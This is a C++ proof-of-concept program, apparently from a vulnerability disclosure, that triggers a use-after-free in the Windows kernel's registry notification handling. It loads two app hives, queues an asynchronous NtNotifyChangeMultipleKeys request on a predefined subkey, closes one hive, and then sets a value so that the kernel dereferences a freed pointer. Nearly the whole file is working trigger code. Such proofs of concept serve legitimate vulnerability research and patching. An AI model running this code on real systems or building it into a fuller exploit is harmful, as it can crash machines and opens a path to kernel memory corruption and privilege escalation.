#include <Windows.h>
#include <winternl.h>

#include <cstdio>

#pragma comment(lib, "ntdll")

extern "C" {

NTSTATUS NTAPI NtNotifyChangeMultipleKeys(
  HANDLE MasterKeyHandle,
  ULONG SubordinateCount,
  OBJECT_ATTRIBUTES SubordinateObjects[],
  HANDLE Event,
  PIO_APC_ROUTINE ApcRoutine,
  PVOID ApcContext,
  PIO_STATUS_BLOCK IoStatusBlock,
  ULONG CompletionFilter,
  BOOLEAN WatchTree,
  PVOID Buffer,
  ULONG BufferSize,
  BOOLEAN Asynchronous
);

}  // extern "C"

int main(int argc, char** argv) {
  if (argc != 3) {
    printf("Usage: %s <poc hive file> <non-existent hive path>\n", argv[0]);
    return 1;
  }

  //
  // Load the proof-of-concept apphive containing a predefined key.
  //

  HKEY hPocAppKey;
  LONG st = RegLoadAppKeyA(argv[1], &hPocAppKey, KEY_ALL_ACCESS, 0, 0);
  if (st != ERROR_SUCCESS) {
    printf("RegLoadAppKeyA failed with error %d\n", st);
    return 1;
  }

  //
  // Load some other apphive (it doesn't have to exist on disk).
  //

  HKEY hNewAppKey;
  st = RegLoadAppKeyA(argv[2], &hNewAppKey, KEY_ALL_ACCESS, 0, 0);
  if (st != ERROR_SUCCESS) {
    printf("RegLoadAppKeyA failed with error %d\n", st);
    RegCloseKey(hPocAppKey);
    return 1;
  }

  //
  // Issue an asynchronous notify request with hNewAppKey as the primary key,
  // and the predefined handle "SubKey" key as the secondary one.
  //

  UNICODE_STRING SubKeyName;
  RtlInitUnicodeString(&SubKeyName, L"SubKey");

  OBJECT_ATTRIBUTES ObjectAttributes;
  InitializeObjectAttributes(&ObjectAttributes, &SubKeyName, 0, hPocAppKey, NULL);

  HANDLE hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
  if (hEvent == NULL) {
    printf("CreateEvent failed with error %u\n", GetLastError());
    RegCloseKey(hNewAppKey);
    RegCloseKey(hPocAppKey);
    return 1;
  }

  IO_STATUS_BLOCK IoStatusBlock;
  NTSTATUS Status = NtNotifyChangeMultipleKeys(hNewAppKey,
                                               1,
                                               &ObjectAttributes,
                                               hEvent,
                                               NULL,
                                               NULL,
                                               &IoStatusBlock,
                                               REG_NOTIFY_CHANGE_LAST_SET,
                                               TRUE,
                                               NULL,
                                               0,
                                               TRUE);
  if (Status != STATUS_PENDING) {
    printf("NtNotifyChangeMultipleKeys returned unexpected 0x%.8x\n", Status);
    RegCloseKey(hNewAppKey);
    RegCloseKey(hPocAppKey);
    return 1;
  }

  //
  // Close the new apphive, which triggers the pending notification, frees all
  // relevant post blocks, and dereferences the "SubKey" key body. As a result
  // of incorrect handling of the predefined key, the old notification object
  // with dangling pointers remains on the list of the hive's notifications.
  //
  
  RegCloseKey(hNewAppKey);

  //
  // Wait until the notification event is signaled.
  //

  st = WaitForSingleObject(hEvent, INFINITE);
  if (st != WAIT_OBJECT_0) {
    printf("WaitForSingleObject returned unexpected 0x%.8x\n", st);
    RegCloseKey(hPocAppKey);
    return 1;
  }

  //
  // Set a value within the poc apphive, which leads to the kernel iterating
  // over the hive's notification list and dereferencing a freed pointer.
  //

  DWORD Value = GetTickCount();
  st = RegSetValueExA(hPocAppKey, "Value", 0, REG_DWORD, (const BYTE*)&Value, sizeof(Value));
  if (st != ERROR_SUCCESS) {
    printf("RegSetValueExA failed with error %d\n", st);
    RegCloseKey(hPocAppKey);
    return 1;
  }

  CloseHandle(hEvent);
  RegCloseKey(hPocAppKey);

  return 0;
}
